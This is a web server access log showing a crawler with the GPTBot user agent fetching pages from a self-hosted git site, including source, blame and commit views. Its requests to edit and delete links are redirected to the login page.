"https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Header.tsx" -[17/Feb/2026:15:33:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/Header.tsx" -[17/Feb/2026:15:33:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/Hero.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Hero.tsx" -[17/Feb/2026:15:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/Hero.tsx" -[17/Feb/2026:15:33:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" -[17/Feb/2026:15:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx-reverse-proxy.conf" -[17/Feb/2026:15:33:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" -[17/Feb/2026:15:33:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/index.tsx" -[17/Feb/2026:15:33:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" -[17/Feb/2026:15:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/index.tsx" -[17/Feb/2026:15:33:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" -[17/Feb/2026:15:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/index.tsx" [Client 74.7.227.38] [Length 804] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" -[17/Feb/2026:15:33:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" -[17/Feb/2026:15:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf?display=source" [Client 74.7.227.38] [Length 11674] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx-reverse-proxy.conf" -[17/Feb/2026:15:33:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/services/geminiService.ts" -[17/Feb/2026:15:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 26552] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js" -[17/Feb/2026:15:33:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md?display=source" [Client 74.7.227.38] [Length 11757] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" -[17/Feb/2026:15:33:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" -[17/Feb/2026:15:33:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=leastissues&state=open" [Client 74.7.227.38] [Length 8495] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" -[17/Feb/2026:15:33:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12767] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:33:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/About.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" -[17/Feb/2026:15:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/About.tsx" -[17/Feb/2026:15:33:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:33:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:34:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/components/Services.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Services.tsx" -[17/Feb/2026:15:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/components/Services.tsx" -[17/Feb/2026:15:34:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Contact.tsx" -[17/Feb/2026:15:34:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/components/Contact.tsx" -[17/Feb/2026:15:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/index.tsx" [Client 74.7.227.38] [Length 11095] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" -[17/Feb/2026:15:34:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/index.tsx" [Client 74.7.227.38] [Length 9758] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/index.tsx" -[17/Feb/2026:15:34:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 35758] [Gzip 11.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 2407] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 20952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 10450] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10952] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:34:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml" -[17/Feb/2026:15:34:06 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" -[17/Feb/2026:15:34:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/index.tsx" -[17/Feb/2026:15:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/index.tsx" -[17/Feb/2026:15:34:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/index.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/index.tsx" -[17/Feb/2026:15:34:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/index.tsx" -[17/Feb/2026:15:34:08 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" -[17/Feb/2026:15:34:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9884] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:15:34:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/js/i18n.js" -[17/Feb/2026:15:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" -[17/Feb/2026:15:34:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10853] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" -[17/Feb/2026:15:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" -[17/Feb/2026:15:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore?display=source" [Client 74.7.227.38] [Length 10983] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" -[17/Feb/2026:15:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore?display=source" [Client 74.7.227.38] [Length 10984] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" -[17/Feb/2026:15:34:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py?display=source" [Client 74.7.227.38] [Length 12969] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" -[17/Feb/2026:15:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" -[17/Feb/2026:15:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py?display=source" [Client 74.7.227.38] [Length 12964] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" -[17/Feb/2026:15:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" -[17/Feb/2026:15:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10839] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/update_status.py" -[17/Feb/2026:15:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10836] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" -[17/Feb/2026:15:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py?display=source" [Client 74.7.227.38] [Length 12965] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 